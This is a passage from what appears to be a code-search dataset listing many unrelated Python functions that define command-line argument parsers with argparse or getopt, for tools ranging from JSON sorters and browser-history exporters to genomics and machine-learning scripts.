argparse.ArgumentParser(\n description=\"\"\"\\\nShow information about a list of scales in Neuroglancer \"info\" JSON file format\n\"\"\")\n parser.add_argument(\"info_file\", nargs=\"?\", default=\"./info\",\n help=\"JSON file containing the information\")\n args = parser.parse_args(argv[1:])\n return args", "def command_line_start(argv, program_name):\n cl_parser = argparse.ArgumentParser(description='Tinkerforge Data Logger')\n\n cl_parser.add_argument('config_file', help=\"Path to the configuration file\")\n cl_parser.add_argument('-v', action=\"store_true\", dest=\"validate\",\n help=\"Just process the validation of the configuration file\")\n\n results = cl_parser.parse_args(argv)\n\n arguments_map = {}\n arguments_map[CONSOLE_CONFIG_FILE] = results.config_file\n arguments_map[CONSOLE_VALIDATE_ONLY] = results.validate\n\n return arguments_map", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--debug\",\n help=\"Print lots of debugging statements\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.ERROR,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.INFO,\n )\n parser.add_argument(\"runscript\", default=None)\n return parser.parse_args()", "def get_args():\n parser = argparse.ArgumentParser(description='A json parser with filters')\n parser.add_argument('-f', '--filename', help='The Json file to parse')\n parser.add_argument('-v', '--verbosity', action='count', default=0,\n help='Increase verbosity of console log')\n parser.add_argument('-o', '--outfile', type=str, help='File to output to')\n parser.add_argument('-i', '--indent', type=int, default=4,\n help='Number of spaces to indent')\n parser.add_argument('-k', '--keyfilter',\n help=('Key filter for the json output separated by \".\"'\n 'page.module.element.note, use partial string'\n ' or * for all'))\n parser.add_argument('-d', '--datafilter', type=str,\n help=('Data Value filter of the key:value pair. '\n 'NOTE: keyfiltering occurs first.'))\n args = parser.parse_args()\n return args", "def _parse_arguments():\n parser = argparse.ArgumentParser(\n prog=\"JSON sorter\",\n description=\"Take a json file, sort the keys and insert 4 spaces for indents.\",\n )\n\n parser.add_argument(\n \"input\", help=\"JSON file to parse.\",\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=sys.stdout,\n type=argparse.FileType(mode=\"w\"),\n help=\"File to write to. Defaults to stdout.\",\n )\n\n # Should probably implement this and CSV as subcommands\n parser.add_argument(\n \"-y\",\n \"--yaml\",\n action=\"store_true\",\n help=\"Whether to sort a YAML file provided as the input.\",\n )\n\n # is there a way to have info printed with this from argparse?\n parser.add_argument(\n \"-l\",\n \"--log\",\n action=\"store_true\",\n help=\"Turn logging on and print to console.\",\n )\n\n parser.add_argument(\n \"-ll\",\n \"--log_level\",\n dest=\"log_level\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n help=\"Set the logging level\",\n )\n\n parser.add_argument(\n \"-V\", \"--version\", action=\"version\", version=\"%(prog)s\" + __version__\n )\n\n if len(sys.argv[1:]) == 0:\n parser.print_help()\n sys.exit()\n\n args = parser.parse_args()\n return args", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def ParseArguments():\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('-f', '--file', help='Text file to be used (e.g. mem/sample_mem.txt)')\n parser.add_argument('--memsize', help='Memory size of generated memory')\n parser.add_argument('--memrange', help='Max range of memory in generated memory')\n parser.add_argument('--mempattern', help='Generated memory pattern focus (normal, loops, rep, random)')\n parser.add_argument('--cachesize', help='Cache size to be used')\n parser.add_argument('--linesize', help='Cache line size to be used')\n parser.add_argument('--mult', help='Run an entered number of simulations back-to-back')\n parser.add_argument('-t', '--test', help='Run tests to verify the simulator is functioning properly', action=\"store_true\")\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Google reminders cli',\n epilog=usage,\n formatter_class=argparse.RawTextHelpFormatter)\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parse(self, command_line=sys.argv[1:]):\n return self._parser.parse_args(command_line)", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # All reference encoders\n parser.add_argument(\"--step\", dest=\"step\", default=\"10\", type=int, help=\"step size\")\n parser.add_argument(\"--repeats\", dest=\"repeats\", type=int, default=1, help=\"repeats\")\n\n parser.add_argument(dest=\"image\", default=None,\n help=\"select the test image to run\")\n\n args = parser.parse_args()\n return args", "def _parse_command_line_arguments():\n parser = ArgumentParser(\n description=(\n 'Command-line tool to generate a list of unique from a TS file from FermiFAST'\n ),\n )\n parser.add_argument(\n 'ts-file',\n type=str,\n help=(\n 'A file containing the TS sky map'\n ),\n )\n parser.add_argument('--skiprows',\n type=int,\n help='number of rows to skip at the top (default 0)',\n required=False)\n parser.set_defaults(skiprows=0)\n arguments = vars(parser.parse_args())\n return arguments", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def handle_cmdline_args():\n\n parser = argparse.ArgumentParser(\n description='Generate synthetic data from a specification in a json '\n 'file using the \"synth-method\" described in the json file. ')\n\n parser.add_argument(\n '-i', dest='infile', required=True,\n help='The input json file. Must contain a \"synth-method\" property')\n\n parser.add_argument(\n '-o', dest='outfile_prefix', required=True, help='The prefix of the output paths (data json and csv), relative to the QUIPP-pipeline root directory')\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"auth\",\n help=\"authentication string for Infermedica API: \"\n \"APP_ID:APP_KEY or path to file containing it.\")\n parser.add_argument(\"--model\",\n help=\"use non-standard Infermedica model/language, \"\n \"e.g. infermedica-es\")\n args = parser.parse_args()\n return args", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_path\", required=True)\n parser.add_argument(\"-c\", \"--config\", required=True)\n return parser.parse_args()", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def _parse_args():\n args = sys.argv[1:]\n cmd_parser = argparse.ArgumentParser()\n cmd_parser.add_argument(\n '--produce-sub',\n dest='produce_sub',\n help='Produce submision file',\n default=False,\n action='store_true',\n )\n cmd_parser.add_argument(\n '--search-cv',\n dest='search_cv',\n help='Perform Search of parameters',\n default=False,\n action='store_true',\n )\n cmd_opts = cmd_parser.parse_args(args=args)\n return cmd_opts", "def parse_command_line():\n try:\n opts, args = getopt.getopt(sys.argv[1:],\n \"ni:ht:\",\n [\"dry-run\", \"interval=\", \"help\", \"timestamp=\"])\n except getopt.error, msg:\n print msg\n print \"for help use --help.\"\n sys.exit(2)\n\n options = {}\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print __doc__\n sys.exit(0)\n elif o in (\"-n\", \"--dry-run\"):\n sys.exit(4) # not yet supported...\n elif o in (\"-i\", \"--interval\"):\n options['interval'] = int(a)\n elif o in (\"-t\", \"--timestamp\"):\n options['timestamp'] = a\n else:\n sys.exit(3) # how did we get here?\n # And what are left as args must be our filter list.\n options['sieves'] = args\n return options", "def parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\n \"config_path\",\n type=str,\n help=\"Path to the JSON configuration file containing the image transformation settings.\",\n )\n parser.add_argument(\n \"img_path\",\n type=str,\n help=\"Path to the input image file to apply transformations.\",\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Bandits algorithms on a click-through \"\n \"rate dataset.\")\n parser.add_argument('--plot', action='store_true')\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='Pure-python command-line calculator.')\n\n parser.add_argument('EXPRESSION', action=\"store\", type=str, help=\"expression string to evaluate\")\n parser.add_argument('-m', '--use-modules', nargs='+', action=\"store\", dest=\"MODULE\", type=str,\n help=\"additional modules to use\")\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", help=\"input file or pattern\", default=\"\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", help=\"output file or pattern\", default=\"\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action='store_true')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action='store_true')\n parser.set_defaults(verbose=False)\n parser.set_defaults(debug=False)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=_program_description)\n parser.add_argument('input_file', help=_input_file_description)\n #parser.add_argument('-v', '--verbose', action='store_true', \n # default=False, help='show progress')\n args = parser.parse_args()\n return args", "def parseArgs():\n parser = argparse.ArgumentParser(description='Runs RHEAS simulation.')\n parser.add_argument('config', help='configuration file')\n parser.add_argument('-d', metavar='DB', help='name of database to connect')\n parser.add_argument('-u', help='update database', action='store_true')\n args = parser.parse_args()\n return args.config, args.d, args.u", "def parse_cmdline(get_parser=get_parser_files):\n return get_parser().parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"generate training data of apks\")\n parser.add_argument(\"-i\", action=\"store\", dest=\"input_file\",\n required=True, help=\"input json file to predict\")\n parser.add_argument(\"-o\", action=\"store\", dest=\"output_file\",\n required=True, help=\"file path to store predicted data\")\n parser.add_argument(\"-server\", action=\"store\", dest=\"server_url\", default=\"http://localhost:5745\",\n required=False, help=\"url of nice2predict server\")\n options = parser.parse_args()\n print options\n return options", "def parse_args():\n parser = argparse.ArgumentParser(description=\"dem process\")\n parser.add_argument(\"--data_dir\", type=str, default=\"/home/dataset/DEM_data/\",\n help=\"path where the dataset is saved\")\n args_opt = parser.parse_args()\n return args_opt", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def _parse_args(argv):\n result = {}\n for arg in argv:\n k, v = arg.split(\"=\")\n result[k] = v\n return result", "def parse_arguments(self,parser):\r\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input-model\", help=\"Path to read input model from\")\n options = parser.parse_args()\n return options", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"CUDAPOA Python API sample program.\")\n parser.add_argument('-m',\n help=\"Run MSA generation. By default consensusis generated.\",\n action='store_true')\n parser.add_argument('-p',\n help=\"Print output MSA or consensus for each POA group.\",\n action='store_true')\n parser.add_argument('-l',\n help=\"Use long or short read sample data.\",\n action='store_true')\n return parser.parse_args()", "def commandline():\n command_parser = argparse.ArgumentParser(description=__doc__, epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter)\n command_parser.add_argument('-i','--input_file', type=str, required=True, help='input file.')\n command_parser.add_argument('-o','--output_file', type=str, required=True, help='output file.')\n args = command_parser.parse_args()\n return args", "def parse_args():\n parser = ArgumentParser(\n description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-i', '--infile', type=is_valid_file, action=FullPaths,\n metavar='FILE', required=True, help='''Settings file'''\n )\n parser.add_argument(\n '-d', '--ddc_file', type=is_valid_file, action=FullPaths,\n metavar='FILE', default='ddc2_nios2_sw.elf',\n help='''DDC2 download file'''\n )\n parser.add_argument(\n '-t', '--time', type=int, metavar='INT', default=5,\n help='''Number of seconds to run DDC2'''\n )\n parser.add_argument(\n '-o', '--outfile', type=str, default='./data/test/test',\n metavar='FILE', required=False,\n help='''Output location of data (no need to include file extension)'''\n )\n parser.add_argument(\n '--live', action='store_true', default=False,\n help='''Live visualisation'''\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='''Verbose'''\n )\n args = parser.parse_args()\n return args", "def arg_parse():\n parser = argparse.ArgumentParser()\n # defines command line arguments\n parser.add_argument('-i', '--input_file', help=\"The input .txt file \" +\n \"within the current directory (the file you \" +\n \"downloaded from VEP\")\n parser.add_argument('-o', '--output_file', help=\"Name for the output \" +\n \".txt file\")\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\"Run arguments for system submitted tasks\")\n\n parser.add_argument(\"-f\", \"--funcs\", type=str, nargs=\"?\", required=True,\n help=\"path to pickle file containing a list of \"\n \"functions/methods that should be run by the \"\n \"submitted process\"\n )\n parser.add_argument(\"-k\", \"--kwargs\", type=str, nargs=\"?\", required=False,\n default=None,\n help=\"path to pickle file containing a dictionary of \"\n \"keyword argumnets that should be passed to the \"\n \"functions\")\n parser.add_argument(\"-e\", \"--environment\", type=str, nargs=\"?\",\n required=False,\n help=\"Optional comma-separated environment variables, \"\n \"which should be given as \"\n \"VARNAME1=value1,VARNAME2=value2 and so on. These \"\n \"will be separated and instantiated into Python's \"\n \"os.environ\")\n\n return parser.parse_args()", "def make_parser():\n parser_ = argparse.ArgumentParser(\n description=\"\"\"\n A tool to retrieve history from\n (almost) any browser on (almost) any platform\n\n██████╗ ██████╗ ██████╗ ██╗ ██╗███████╗███████╗██████╗ ██╗ ██╗██╗███████╗████████╗ ██████╗ ██████╗ ██╗ ██╗\n██╔══██╗██╔══██╗██╔═══██╗██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗╚██╗ ██╔╝\n██████╔╝██████╔╝██║ ██║██║ █╗ ██║███████╗█████╗ ██████╔╝█████╗███████║██║███████╗ ██║ ██║ ██║██████╔╝ ╚████╔╝\n██╔══██╗██╔══██╗██║ ██║██║███╗██║╚════██║██╔══╝ ██╔══██╗╚════╝██╔══██║██║╚════██║ ██║ ██║ ██║██╔══██╗ ╚██╔╝\n██████╔╝██║ ██║╚██████╔╝╚███╔███╔╝███████║███████╗██║ ██║ ██║ ██║██║███████║ ██║ ╚██████╔╝██║ ██║ ██║\n╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝\n \"\"\", # noqa: E501\n epilog=\"\"\"\n Checkout the GitHub repo\n https://github.com/pesos/browser-history\n if you have any issues or want to help contribute\"\"\",\n formatter_class=RawDescriptionHelpFormatter,\n )\n\n parser_.add_argument(\n \"-t\",\n \"--type\",\n default=\"history\",\n help=f\"\"\"\n argument to decide whether to retrieve history or bookmarks.\n Should be one of {AVAILABLE_TYPES}.\n Default is history.\"\"\",\n )\n parser_.add_argument(\n \"-b\",\n \"--browser\",\n default=\"all\",\n help=f\"\"\"\n browser to retrieve history or bookmarks from. Should be one\n of all, default, {AVAILABLE_BROWSERS}.\n Default is all (gets history or bookmarks from all browsers).\n \"\"\",\n )\n\n parser_.add_argument(\n \"-f\",\n \"--format\",\n default=\"infer\",\n help=f\"\"\"\n Format to be used in output. Should be one of {AVAILABLE_FORMATS}.\n Default is infer (format is inferred from the output file's\n extension. If no output file (-o) is specified, it defaults to csv)\"\"\",\n )\n\n parser_.add_argument(\n \"-o\",\n \"--output\",\n default=None,\n help=\"\"\"\n File where history output or bookmark output is to be written.\n If not provided, standard output is used.\"\"\",\n )\n\n parser_.add_argument(\n \"-p\",\n \"--profile\",\n default=None,\n help=\"\"\"\n Specify the profile from which to fetch history or bookmarks. If\n not provided all profiles are fetched\n \"\"\",\n )\n\n parser_.add_argument(\n \"--show-profiles\",\n default=None,\n metavar=\"BROWSER\",\n help=f\"\"\"\n List all available profiles for a given browser where browser\n can be one of default, {AVAILABLE_BROWSERS}. The browser\n must always be provided.\n \"\"\",\n )\n\n parser_.add_argument(\n \"-v\", \"--version\", action=\"version\", version=\"%(prog)s \" + __version__\n )\n\n return parser_", "def parse_args():\n parser = argparse.ArgumentParser(description=\"\"\"balances_to_merkle_root script.\n\n Expects a JSON file that contains tree height and vaults data, and prints the root of the\n corresponding merkle tree.\n \"\"\")\n parser.add_argument('--balances_file', required=True,\n help='Json file containing the vaults balances.')\n parser.add_argument('--workers', type=int, default=8)\n\n args = parser.parse_args()\n return args", "def _parse_arg_list(self):\n\t\targ_list = {}\n\t\tfor arg in getopt.getopt(sys.argv[1:], 'c:r:j:d')[0]:\n\t\t\targ_list[arg[0][1:]] = arg[1]\n\t\n\t\treturn arg_list", "def parse_command_line():\n parser = ArgumentParser(description=__doc__,\n formatter_class=RawTextHelpFormatter,\n epilog=\"For a list of table formats check this page: \"\n \"https://github.com/astanin/python-tabulate#table-format\"\n )\n requir = parser.add_argument_group(\"required arguments\")\n requir.add_argument(\"-f\", \"--find\",\n required=True,\n help=\"Search string to identify\"\n )\n requir.add_argument(\"-k\", \"--client_id\",\n required=True,\n help=\"CrowdStrike API client ID\"\n )\n requir.add_argument(\"-s\", \"--client_secret\",\n required=True,\n help=\"CrowdStrike API client secret\"\n )\n parser.add_argument(\"-r\", \"--reverse\",\n help=\"Reverse the sort.\",\n default=False,\n action=\"store_true\"\n )\n parser.add_argument(\"-t\", \"--types\",\n help=\"Types to search (indicator, report or actor). Comma delimited.\"\n )\n parser.add_argument(\"-tf\", \"--table_format\",\n help=\"Set the table format.\",\n default=\"fancy_grid\"\n )\n parser.add_argument(\"-o\", \"--output_prefix\",\n help=\"Output filename prefix for storing results (CSV format).\",\n default=None\n )\n\n parsed = parser.parse_args()\n allow = [\"indicator\", \"report\", \"actor\"]\n parsed.types = [t for t in parsed.types.split(\",\") if t in allow] if parsed.types else allow\n\n return parsed", "def parse_arguments():\n parser = ArgumentParser()\n\n # For development/testing\n parser.add_argument(\"--dev\", help=\"run the code of the developers tag\")\n\n return parser.parse_args()", "def parse_cmdline_args():\n parser = argparse.ArgumentParser(description=\"Guesses the functional element for host.\")\n ##\n ## Internal options\n ##\n parser.add_argument(\"--json\", dest=\"json\", action='store_true', help=\"output in JSON\")\n\n ##\n ## PuppetDB options\n ##\n pdbconf = PdbConfig()\n pdbconf.add_standard_args(parser)\n\n parser.add_argument(\"host\", metavar=\"HOST\",\n help=\"hostnames to query for FE\")\n\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse Diff Exp output files\")\n parser.add_argument(\"raw_file\", help=\"DE analysis output file (.tab).\")\n parser.add_argument(\"output_json\", help=\"Output JSON\")\n parser.add_argument(\"output_file\", help=\"Output file\")\n parser.add_argument(\"--gene_id\", help=\"Gene_IDs column name\", type=str)\n parser.add_argument(\"--fdr\", help=\"FDR column name\", type=str)\n parser.add_argument(\"--pvalue\", help=\"Pvalue column name\", type=str)\n parser.add_argument(\"--fwer\", help=\"FWER column name\", type=str)\n parser.add_argument(\"--logodds\", help=\"Log Odds column name\", type=str)\n parser.add_argument(\"--logfc\", help=\"logfc column name\", type=str)\n parser.add_argument(\"--stat\", help=\"Statistics column name\", type=str)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"in_fq\", help=\"The fastq file containing Hi-C reads.\")\n parser.add_argument(\n \"-r\",\n \"--reference\",\n required=True,\n help=\"Path to the reference genome, in FASTA format.\",\n )\n parser.add_argument(\n \"-p\",\n \"--nb_processors\",\n default=1,\n type=int,\n help=\"number of CPUs used for alignment.\",\n )\n parser.add_argument(\n \"-o\",\n \"--out_sam\",\n help=\"Path to the output SAM file for the alignment of in_fq.\",\n )\n parser.add_argument(\n \"-T\",\n \"--tempdir\",\n default=\".\",\n help=\"Directory to write temporary files. Defaults to current directory.\",\n )\n parser.add_argument(\n \"-m\",\n \"--minimap2\",\n default=False,\n action=\"store_true\",\n help=\"Use minimap2 instead of bowtie for the alignment.\",\n )\n parser.add_argument(\n \"-l\",\n \"--min_len\",\n type=int,\n default=20,\n help=\"Minimum length to which reads should be truncated.\",\n )\n return parser.parse_args()", "def parsed_args():\n parser = ArgumentParser()\n parser.add_argument(\n \"--input_csv\",\n default=\"bios.csv\",\n type=str,\n help=\"CSV containing the info from the form\",\n )\n parser.add_argument(\n \"--output_yml\",\n default=\"bios.yml\",\n type=str,\n help=\"Output YAML file\",\n )\n parser.add_argument(\n \"--output_photos\",\n default=\"./assets/img/team/team-photos\",\n type=str,\n help=\"List of photos URL\",\n )\n\n return parser.parse_args()", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def generate_parser():\n description = \"%(prog)s -- Predict RNA expression from cCREs and Ideas states\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('-r', '--rna', dest=\"rna\", type=str, action='store', required=True,\n help=\"RNA expression file\")\n parser.add_argument('-s', '--state', dest=\"state\", type=str, action='store', required=True,\n help=\"State file\")\n parser.add_argument('-c', '--cre', dest=\"cre\", type=str, action='store', required=True,\n help=\"CRE file\")\n parser.add_argument('-l', '--lessone', dest=\"lessone\", type=int, action='store', default=0,\n help=\"Cell type to leave out\")\n parser.add_argument('-o', '--output', dest=\"output\", type=str, action='store', default='./out',\n help=\"Output prefix\")\n parser.add_argument('-i', '--iterations', dest=\"iterations\", type=int, action='store', default=100,\n help=\"Refinement iterations\")\n parser.add_argument('-t', '--threads', dest=\"threads\", type=int, action='store', default=1,\n help=\"Number of threads to use\")\n parser.add_argument('--initialization-dist', dest=\"init_dist\", type=int, action='store', default=1000,\n help=\"Beta initialization distance cutoff\")\n parser.add_argument('--promoter-dist', dest=\"promoter_dist\", type=int, action='store',\n help=\"If specified, learn betas for promoters up to promoter distance cutoff\")\n parser.add_argument('--cre-dist', dest=\"cre_dist\", type=int, action='store',\n help=\"CRE distance cutoff\")\n parser.add_argument('--cre-exclude-promoter', dest=\"cre_noprom\", action='store_true',\n help=\"Exclude promoter from CREs\")\n parser.add_argument('--sum-cres', dest=\"sum_cres\", action='store_true',\n help=\"Sum CREs instead of finding overall proportions\")\n parser.add_argument('--correlation', dest=\"correlation\", type=float, action='store', default=0.0,\n help=\"Initial correlation cutoff\")\n parser.add_argument('--pca', dest=\"pca\", type=float, action='store',\n help=\"Convert state ratios into PCAs explaining this much variance\")\n parser.add_argument('--trainstats', dest=\"train_stats\", action='store_true',\n help=\"Output training statistics\")\n parser.add_argument('--max-CREs', dest=\"max_cres\", action='store', type=int, default=0,\n help=\"Maximum number of CREs allowed to be selected per TSS at a time (0 is no max)\")\n parser.add_argument('--skip-training', dest=\"skip_training\", action='store_true',\n help=\"Skip CRE-TSS pairining refinement\")\n parser.add_argument('--shuffle-states', dest=\"shuffle_states\", action='store_true',\n help=\"Shuffle the state proportions of each CRE as a negative control\")\n parser.add_argument('-e', '--eRP', dest=\"eRP\", action='store', type=str,\n help=\"A previously generated eRP TSS-cCRE pair file. Passing this will ignore initial TSS-CRE pair selection\")\n parser.add_argument('--seed', dest=\"seed\", action='store', type=int,\n help=\"Random number generator state seed\")\n parser.add_argument('-v', '--verbose', dest=\"verbose\", action='store', type=int, default=2,\n help=\"Verbosity level\")\n return parser", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n return parser.parse_args()", "def handle_arguments():\n result = {'input_pkg':'', 'output_pkg':''}\n\n try:\n args = sys.argv[1:]\n optlist = gnu_getopt(args, 'h', ['help'])\n except GetoptError:\n print 'Error when parsing arguments.'\n more_informations()\n\n if len(sys.argv) < 2:\n print 'No input file.'\n more_informations()\n\n for option, value in optlist[0]:\n if option in ['-h', '--help']:\n usage()\n \n result['input_pkg'] = optlist[1][0]\n\n if len(sys.argv) > 3:\n result['output_pkg'] = optlist[1][1]\n\n return result", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Eval')\n parser.add_argument(\n '--cfg', help='experiment configure file path', type=str, \\\n default=\"validation.config.Config\")\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Arguments get parsed via --commands')\n \n parser.add_argument('-in', dest='input', type=str, \n help=\"Specify the RTStruct file read.\")\n parser.add_argument('--out', dest='output', type=str, default=\"RTSS_info.json\",\n help=\"Specify the RTStruct file read.\")\n \n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\n \"This script receives 'grouped_hits.txt', uses a FASTA file to get the \\\n \\nsequences, uses MAFFT to align each group, then generates a consensus \\\n \\nsequence 